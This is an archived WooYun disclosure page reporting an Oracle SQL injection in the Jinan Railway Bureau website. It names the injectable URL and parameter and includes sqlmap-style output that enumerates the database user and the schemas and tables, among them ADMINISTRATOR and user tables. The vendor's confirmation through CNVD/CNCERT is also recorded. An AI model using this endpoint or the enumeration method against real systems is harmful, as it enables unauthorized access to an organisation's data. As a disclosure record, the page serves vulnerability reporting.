当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-042944

漏洞标题:济南铁路局oracle注入漏洞

相关厂商:济南铁路局

漏洞作者: adm1n

提交时间:2013-11-15 11:33

修复时间:2013-12-30 11:34

公开时间:2013-12-30 11:34

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-11-15: 细节已通知厂商并且等待厂商处理中
2013-11-19: 厂商已经确认,细节仅向厂商公开
2013-11-29: 细节向核心白帽子及相关领域专家公开
2013-12-09: 细节向普通白帽子公开
2013-12-19: 细节向实习白帽子公开
2013-12-30: 细节向公众公开

简要描述:

济南铁路局oracle注入漏洞

详细说明:

1.http://www.jntlj.com/cx_nr.aspx?type=SSXW&id=5674

漏洞证明:

web server operating system: Windows 2008
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Oracle
[15:06:04] [INFO] fetching current user
[15:06:04] [INFO] retrieved: OFFICE
current user: 'OFFICE'
[15:06:04] [WARNING] HTTP error codes detected during run:
[15:07:31] [INFO] fetching current database
[15:07:31] [INFO] resumed: OFFICE
[15:07:31] [WARNING] on Oracle you'll need to use schema names for enumeration a
s the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle): 'OFFICE'
Database: XDB
[1 table]
+--------------------------------+
| XDB$XIDX_IMP_T |
+--------------------------------+
Database: OFFICE
[33 tables]
+--------------------------------+
| ADMINISTRATOR |
| ANSWER_TEXT |
| BGAPP_DWZD |
| BGAPP_FILE |
| BGAPP_FILE_BAK |
| BGAPP_MEDIA |
| BGAPP_MESSAGE |
| BGAPP_USER |
| GW_DWZD |
| GW_FILE |
| GW_MEDIA |
| GW_USER |
| INFO_RANK |
| INFO_TYPE |
| LOCAL_DIC |
| MAILBOX |
| MAILBOX_TEXT |
| NUMBER_STATUS |
| OPER |
| OPERATE_LOG |
| OPER_DEF |
| QUERY_LOG |
| SUB_MENU |
| UNIT_DEPART_CODE |
| USER_CODE |
| WANGDIAN |
| XCINFO_BASE |
| XCINFO_IMAG |
| XCINFO_TEXT |
| YWIMAGES |
| YWJDXX |
| YWJDXX_TEXT |
| YWLINKBASE |
+--------------------------------+
Database: APEX_030200
[3 tables]
+--------------------------------+
| WWV_FLOW_DUAL100 |
| WWV_FLOW_LOV_TEMP |
| WWV_FLOW_TEMP_TABLE |
+--------------------------------+
Database: OLAPSYS
[2 tables]
+--------------------------------+
| OLAP_SESSION_CUBES |
| OLAP_SESSION_DIMS |
+--------------------------------+
Database: SYSTEM
[7 tables]
+--------------------------------+
| HELP |
| MVIEW$_ADV_INDEX |
| MVIEW$_ADV_OWB |
| MVIEW$_ADV_PARTITION |
| OL$ |
| OL$HINTS |
| OL$NODES |
+--------------------------------+
Database: EXFSYS
[1 table]
+--------------------------------+
| RLM$PARSEDCOND |
+--------------------------------+
Database: MDSYS
[47 tables]
+--------------------------------+
| NTV2_XML_DATA |
| OGIS_GEOMETRY_COLUMNS |
| OGIS_SPATIAL_REFERENCE_SYSTEMS |
| SDO_COORD_AXES |
| SDO_COORD_AXIS_NAMES |
| SDO_COORD_OPS |
| SDO_COORD_OP_METHODS |
| SDO_COORD_OP_PARAMS |
| SDO_COORD_OP_PARAM_USE |
| SDO_COORD_OP_PARAM_VALS |
| SDO_COORD_OP_PATHS |
| SDO_COORD_REF_SYS |
| SDO_COORD_SYS |
| SDO_CRS_GEOGRAPHIC_PLUS_HEIGHT |
| SDO_CS_CONTEXT_INFORMATION |
| SDO_CS_SRS |
| SDO_DATUMS |
| SDO_DATUMS_OLD_SNAPSHOT |
| SDO_ELLIPSOIDS |
| SDO_ELLIPSOIDS_OLD_SNAPSHOT |
| SDO_GEOR_PLUGIN_REGISTRY |
| SDO_GEOR_XMLSCHEMA_TABLE |
| SDO_GR_MOSAIC_0 |
| SDO_GR_MOSAIC_1 |
| SDO_GR_MOSAIC_2 |
| SDO_GR_MOSAIC_3 |
| SDO_GR_RDT_1 |
| SDO_PREFERRED_OPS_SYSTEM |
| SDO_PREFERRED_OPS_USER |
| SDO_PRIME_MERIDIANS |
| SDO_PROJECTIONS_OLD_SNAPSHOT |
| SDO_ST_TOLERANCE |
| SDO_TIN_PC_SEQ |
| SDO_TIN_PC_SYSDATA_TABLE |
| SDO_TOPO_DATA$ |
| SDO_TOPO_RELATION_DATA |
| SDO_TOPO_TRANSACT_DATA |
| SDO_TXN_IDX_DELETES |
| SDO_TXN_IDX_EXP_UPD_RGN |
| SDO_TXN_IDX_INSERTS |
| SDO_UNITS_OF_MEASURE |
| SDO_WFS_LOCAL_TXNS |
| SDO_WS_CONFERENCE |
| SDO_WS_CONFERENCE_PARTICIPANTS |
| SDO_WS_CONFERENCE_RESULTS |
| SDO_XML_SCHEMAS |
| SRSNAMESPACE_TABLE |
+--------------------------------+
Database: WZPT
[1 table]
+--------------------------------+
| RMSTAT_CATALOGDT |
+--------------------------------+
Database: CTXSYS
[5 tables]
+--------------------------------+
| DR$NUMBER_SEQUENCE |
| DR$OBJECT_ATTRIBUTE |
| DR$POLICY_TAB |
| DR$THS |
| DR$THS_PHRASE |
+--------------------------------+

修复方案:

看着办吧~

版权声明:转载请注明来源 adm1n@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2013-11-19 21:35

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给山东分中心,由其后续联系网站管理单位处置。rank 11

最新状态:

暂无


漏洞评价:

评论